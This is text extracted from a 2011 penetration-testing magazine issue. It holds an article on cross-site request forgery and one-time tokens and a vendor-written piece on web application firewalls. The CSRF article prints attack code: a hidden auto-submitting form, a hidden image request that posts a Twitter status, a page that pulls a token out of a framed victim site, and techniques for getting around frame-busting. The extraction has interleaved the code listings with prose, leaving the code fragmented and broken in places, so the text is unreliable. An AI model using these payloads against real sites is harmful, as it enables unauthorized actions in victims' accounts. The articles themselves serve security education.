IN-DEPTH ANALYSIS CYBER GATES 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users.

n simple words, when an evil website posts a new status to your Twitter account, while your Twitter login session is still active.

approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1).

Csrf Basics

Usless Defenses
Only accept POST

A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src=http://twitter.com/home?status=evil.com style=display:none/>

The following are the weak defenses: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.

Many web developers use POST instead of GET requests to avoid this kind of a malicious attack. But this
Listing 1. HTML code used to bypass protection
<div style="display:none">

Referrer checking

Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP request without referrers exist.

Requiring multi

<iframe name="hiddenFrame"></iframe>

<form name="Form" action="http://site.com/post.php" method="POST"> <input target="hiddenFrame" name="message"

Step transactions. CSRF attacks can perform each step in order.

Defense

type="text"

<input type="submit" /> </form> </div>

www.evil.com" />

value="I like

<script>document.Form.submit();</script>

The approach used by many web developers is the CAPTCHA systems and one- time tokens. CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Page 34

01/2011 (1) November

http://pentestmag.com

webpage forms hidden field and in a session at the same time to compare them after the page form submission. Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks. Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers. For example the following PHP code:
<?php

index.php(Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:
post.php(Victim website)

In-depth Analysis

$token = md5(uniqid(rand(), TRUE)); $_SESSION[token] = $token; ?>

In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario:Listing 4.
index.php(Evil website)

Defense Using One-time Tokens

To understand better how this system works, lets take a look to a simple webpage which has a form with onetime token: Listing 2.
Listing 2. Wrong token
<?php session_start();?> <html> <head>

For security reasons, the same origin policy in browsers restricts access of browser-side program-ming languages, such as JavaScript, to access a remote content and the browser throws the following exception:
Permission denied to access property document token.value;

var token = window.frames[0].document.forms[messageForm].

<title>GOOD.COM</title> </head> <body> <?php

Browsers settings are not hard to modify. So the best way for web application security is to secure web application itself.

$token = md5(uniqid(rand(),true)); $_SESSION['token'] = $token; ?>

Frame Busting

<form name="messageForm" action="post.php" method="POST"> <input type="text" name="message"> <input type="submit" value="Post"> </form> </body> </html>

The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small piece of Javascript code used to protect web pages from being framed.
<script type=text/javascript> </script>

<input type="hidden" name="token" value="<?php echo $token?>">

if(top != self) top.location.replace(location);

Listing 3. Correct token


<?php

It consists of Conditional statement and Counter-action statement.

Common conditional statements are the following:


if (top != self)

session_start();

if($_SESSION['token'] == $_POST['token']){

$message = $_POST['message'];

echo "<b>Message:</b><br/>".$message; $file = fopen('messages.txt','a'); fwrite($file,$message."\r\n"); fclose($file); } else { }

if (top.location != self.location) if (top.location != location) if (parent.frames.length > 0) if (window != top) if (window.top !== window.self) if (window.self != window.top) if (parent && parent != window)

echo 'Bad request.'; ?>

if (parent && parent.frames && parent.frames.length>0) ames.length!=0))

if((self.parent&&!(self.parent===self))&&(self.parent.fr

01/2011 (1) November

Page 35

http://pentestmag.com

WEB APP VULNERABILITIES


And common counter-action statements are these:
top.location = self.location

References

top.location.href = document.location.href top.location.replace(self.location) top.location.href = window.location.href top.location.replace(document.location) top.location.href = URL document.write() top.location.href = window.location.href }

Cross-Site Request Forgery http://www.owasp.org/ index.php/Cross-Site_Request_Forgery_%28CSRF%29; http:// projects.webappsec.org/w/page/13246919/Cross-Site-RequestForgery Same Origin Policy FrameKiller(Frame Busting) http://en.wikipedia.org/wiki/ Framekiller; http://seclab.stanford.edu/websec/framebusting/ framebust.pdf

top.location.replace(document.location) top.location.replace(URL) top.location.replace(window.location.href) top.location.href = location.href self.parent.location = document.location

</script>

<iframe src=http://www.good.com></iframe>

Method 2

Using Double framing:


<iframe src=second.html></iframe> second.html <iframe src=http://www.site.com></iframe>:

parent.location.href = self.document.location

Different FrameKillers are used by web developers and different techniques are used to bypass them:

Method 1
<script> window.onbeforeunload=function(){

Best Practices

And the best example of FrameKiller is the following:


<style> html{ display : none; } </style> <script> if( self == top ){ document.documentElement.style.displa else { top.location = self.location; } </script> y=block;}

return Do you want to leave this page? ;

Listing 4. Real scenario of the attack


<html> <head> <title>BAD.COM</title> function submitForm(){ var token = window.frames[0].document.forms["message var myForm = document.myForm; myForm.token.value = token; myForm.submit(); } </script> </head> <body onLoad="submitForm();"> <div style="display:none"> <iframe src="http://good.com/index.php"></iframe> Form"].elements["token"].value;

Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser.

SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES www.cybergates.am | samvel.gevorgyan@cybergates.am Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvels work ethics, for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting), SQL Injection, CSRF(Cross-Site Request Forgery), etc. Thus Samvel has transformed his job to a higher level, and he is gradually becoming more complete security professional.

<form name="myForm" target="hidden" action=http://

<input type="text" name="message" value="I like www.bad.com" /> <input type="hidden" name="token" value="" /> <input type="submit" value="Post"> </form> </div> </body> </html>

good.com/post.php method="POST">

01/2011 (1) November

Page 36

http://pentestmag.com

WEB APPLICATION CHECKING

First the
Security Gate, then the Airplane What needs to be heeded when checking web applications?
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications, the backlash comes quickly because many are accessible for everyone worldwide.

hey are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks. In most commercial and non-commercial areas the internet has developed into an indispensible medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past and while we used to have to search laboriously for information, we now have the search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publically. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the companys own intranet. A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as
01/2011 (1) November

an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of and more powerful applications that provide the internet user with the required functions as fast and simply as possible. Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these socalled web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available or they are not heeded. In the end, this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten. The productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently. Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous, without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby,
http://pentestmag.com

Page 38

they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications. As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher. While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this: Compared with the network level, you dont need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and making action anonymous. As a result, the risk for attackers remains relatively low and so does the inhibition threshold for hackers. Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised. There were hardly any threat scenarios because the attackers focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,

professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was. The problem with more recent web applications: Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications and as such to further systems and to their owners or users sensitive data. Some assume, that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong. The opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers security services would protect the data. Providers are not responsible for a safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.

Figure 1. This model (based on Everett M. Rogers adoption curve from Diffusion of innovations) shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit the similar Technology Adoption Lifecycle. There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability. Bottom line: Security is an afterthought

01/2011 (1) November

Page 39

http://pentestmag.com

WEB APPLICATION CHECKING


Web Applications Under Fire
The security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now. There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications. For years now the major types have been: All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection) Cross Site Scripting (XSS) Hidden Field Tampering Parameter Tampering Cookie Poisoning Buffer Overflow Forceful Browsing Unauthorized access to web servers Search Engine Poisoning Social Engineering However, this intention is generally doomed to failure from the outset, because the later integration of security functions in an existing application is in most cases not only difficult, but also above all, expensive. Another example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions. The developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious, but also harbors the danger of making mistakes. Another example is programs that do not just use the session attributes for authentification. In this case it is not straightforward to update the session ID after logging in. This makes the application susceptible for Session Fixation. If existing web applications display weak spots and the probability is relatively high then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity, whether and to what extent the problems must be resolved or if further measures should be taken at the same time. Often however, the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs. The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered over time. And by this time correcting the errors is once again timeconsuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or as an important business process. Despite this, the demand for good code programming that sensibly combines effectiveness, functionality and security still has top priority. The safer a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted. The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications. A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such it represents a special case of Application-LevelFirewalls (ALF) or Application-Level-Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
http://pentestmag.com

The only more recent trend: The attackers have recently started to combine the methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.

One Example

Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch the weak points. They launch automated attacks in order to identify with high efficiency as many worthwhile targets as possible in the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications, which give away information freely. The attackers then only have to evaluate this information. As such they have an extensive basis for later targeted attacks.

How to Make a Web Application Secure

There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines. Companies would have to increase the security of older web applications to the required standards later.
01/2011 (1) November

Page 40

systems (IDS) a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed. Secure programming and WAFs are not contradictory, but actually complement each other: Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots. After introducing a WAF, it is still recommendable to check the security functions, as conducted by Penetration Testers. This might reveal for example that the system can be misused by SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then this can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis. This would lead to misjudging the achieved security status: Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing the Web Application Security.

WAF Functionality

A major advantage of WAFs is that one single system can close the security loopholes for several web

applications. If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications. With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser. In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram. If for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality, such as their maximum length, valid number of characters and permitted value area. Of course, an integrated XML Firewall should also be the standard these days, because increasingly more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.

Figure 2. An overview of how a Web Application Firewall works

01/2011 (1) November

Page 41

http://pentestmag.com

WEB APPLICATION CHECKING


Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature. In this way these filters can to a certain extent automatically prevent malicious code from reaching the browser, if for example a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. However in practice, a whitelist only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. However, the contrary blacklist only approach offers attackers too many loopholes. Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy-to-use by using templated negative security profile (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page. To prevent a high number of false positives some manufacturers provide an exception profiler. This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator. At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated. Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as OneArm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application. Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally this mode means that all data is passed on to the web application, including potential attacks even if the security checks have been conducted. The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the systems physical ports (WAN and LAN). As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. And, only special functions are available here. As a Full Reverse Proxy a WAF provides for example Instant SSL that converts httppages into HTTPS without making changes to the code. Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applications hidden URL. This means that the applications actual web address remains cloaked. With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of ones

Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult

01/2011 (1) November

Page 42

http://pentestmag.com

own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft and Cookie-Security prevents identity theft. But the ProxyWAFs must also be configured to correspond with the respective terms. Penetration tests help with the correct configuration.

Demands on Penetration Testers

When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. The companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements: Does the system have a Web Application Firewall? Does the web traffic occur via a WAF Proxy function? Are the web servers shielded against direct access by attackers? Is there a simple SSL encryption for the data traffic, even if the application or the server do not support this? Are all known and unknown threats blocked?

A further point is the protection against data theft. This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it. Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests. Since, by its very nature, a WAF stands on the frontline, certain test criteria should be applied to it as well. These include in particular the identity and access management. In this context the principle of least privileges applies: The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application. All other privileges are blocked. A general integration of the WAF in Active Directory, eDirectory or other RADIUS- or LDAPcompatible authentication services makes this work easier. The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces
01/2011 (1) November

lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be recorded intuitively, are clearly displayed, easy to understand and to set, then this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturers products or, even better, a management center which administrators can use to manage numerous other network and security products with as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites. In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. It should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snap shot, but want to help their customers in creating sustainable security, they should always include the WAFs administration into their assessment.

OLIVER WAI
Oliver Wai leads product marketing for Barracudas line of Web application security and application delivery product lines. In his role, Oliver is a core member of Barracudas security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an M.S. in Management Science & Engineering from Stanford University and B.S. (Cum Laude) in Computer Engineering from Santa Clara University.

Page 43

http://pentestmag.com

In the upcoming issue of the

Web Session Management Password management in code ETHical Ghosts on SF1 Preservation namely in the online gambling industry Cyber Security War

Available to download on December 22th


If you would like to contact Pentest team, just send an email to en@pentestmag.com. We will reply immediately. We will reply a.s.a.p.

T o D o L is t

nalyzing oftware ecurity tilizing isk valuation

Know your softwares pedigree. Get ASSURE .


Learn more about software security assurance by visiting or by calling +1 (678) 809-2100.
Scan code for more on the state of software security.

You might also like